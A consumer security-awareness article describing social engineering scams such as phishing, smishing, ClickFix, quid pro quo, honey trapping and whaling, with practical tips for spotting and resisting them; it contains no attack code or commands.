Unlike many cyberattacks that focus on breaking through technical defenses, social engineering works by manipulating human behaviour – scammers gain trust, exploit vulnerabilities or create anxiety, fear or delight in people to gain access to systems and data.
Incredibly common and getting more sophisticated every year, social engineering forms the foundation of many scams – in fact, it’s been reported that 98% of cyberattacks rely on social engineering at some stage.
Why social engineering is so common
Social engineering is a common tactic because it works. Human error is predictable – scammers know that people can be tricked, and they know how to take advantage of their sensitivities. It’s also low cost – it’s much cheaper and faster for criminals to manipulate people than it is to try to break through layers of technical security. Carrying out social engineering attacks is also getting easier, as AI-generated voices, videos and messages allow scammers to create convincing material that can fool their targets.
Types of social engineering attacks
There are many different types of social engineering methods, each with their own strength and specialty. Here’s a rundown of some of the most common.
Phishing
Phishing is the most common way of carrying out a social engineering scheme – 90% of all attacks start with a phishing email.
In a phishing attempt, a cybercriminal will craft a convincing email posing as a reputable organization such as a bank, government or other trusted business. A typical phishing email will claim a data breach, contest or account issue and try to trick you into clicking a link to resolve the problem or take advantage of a prize. That link will lead to a fake website (that looks authentic), where you’ll be asked to enter your personal information such as a credit card number, account number, password, date of birth and/or driver’s license.
Spear phishing
While phishing is generally a “bulk” activity, where cyber criminals attack at random, spear phishing occurs when a fraudster specifically targets an individual or organization to gain specific sensitive information.
Smishing
Smishing – or SMS phishing – uses text messages to trick people into downloading malware or sharing information. Given that SMS open rates are upwards of 98% (compared to the 26.8% open rate for emails) , it is an increasingly popular way to attempt a social engineering attack.
ClickFix
A new technique that was first seen in the spring of 2024, ClickFix is an attempt to execute a malicious command on a target’s computer. The attack normally begins with a pop-up window that alerts the user of a technical problem. To fix it, they need to perform a few simple steps, which involve clicking a button or copying a line of code and pasting it into the system’s “Run” application. Once that’s done, malware is downloaded and installed onto the computer – ultimately infecting the device and potentially a whole network.
Common “problems” include:
-
Unable to display the page – need to refresh browser: The user is told they need to install a browser update to display the page
-
Error loading document: The user can’t view a document and are shown a notification to install a plugin to view it online
-
Error opening a document from an email: Similar to the above, a user can’t open a file from an email and are directed to download a plugin and presented with a ‘how to fix’ button
Quid Pro Quo
In this social engineering attack, a fraudster impersonates an IT professional, offering technical assistance. In exchange for addressing an issue, they ask for sensitive information and login credentials.
Honey Trapping (romance scams)
In a honey trapping scam, a scammer uses flattery and attraction to manipulate someone into revealing sensitive information, sending money or compromising themselves in other ways.
Whaling
Whaling is a phishing attack that targets high-profile company employees (referred to as “whales” in cybercrimes). These attacks are generally highly personalized, as the fraudster invests considerable time researching the target.
How to defend against social engineering scams
While social engineering attacks are common and sophisticated, there are ways to spot red flags and defend against them. Here are some tips for protecting yourself and your information:
-
Carefully check emails, including names, addresses and copy
-
Check for spelling and grammar mistakes
-
Look closely at the email address – many addresses will look like one in your contact list but will be slightly different (i.e, an extra letter, or a “0” instead of an “O”
-
-
Recognize common phishing email subject lines: Every phishing email uses a powerful subject line to try to hook a target. Common lines to watch out for include:
-
Notice: Service cancellation
-
Payment failed: Update your billing information
-
Your account has been suspended
-
You’ve won a $500 gift card
-
Get paid to work from home
-
Shipping issue – please confirm address
-
-
Pause before acting
-
Phishing messages are designed to create a strong emotion. Before reacting, slow down and consider the source and content of the message
-
-
Verify the identity of the sender
-
If it’s someone you don’t know personally, do some research into who they are and contact them on an alternate channel
-
If a message from a friend or colleague sounds off, treat it as suspicious
-
If you receive a message from an established organization asking for sensitive information, contact them using a verified phone number to confirm the request – don’t respond to the email or text
-
-
Shrink your online footprint
-
The more you share online and on social media, the more information hackers have to target you. Real-time vacation photos, pet names and school details can all be used to build rapport in a message
-
Technology may evolve, but as long as scammers can effectively fool people, social engineering will remain one of the most effective tools they use. The best way to fight back is to question anything that feels off, pause before you click and trust your instincts.
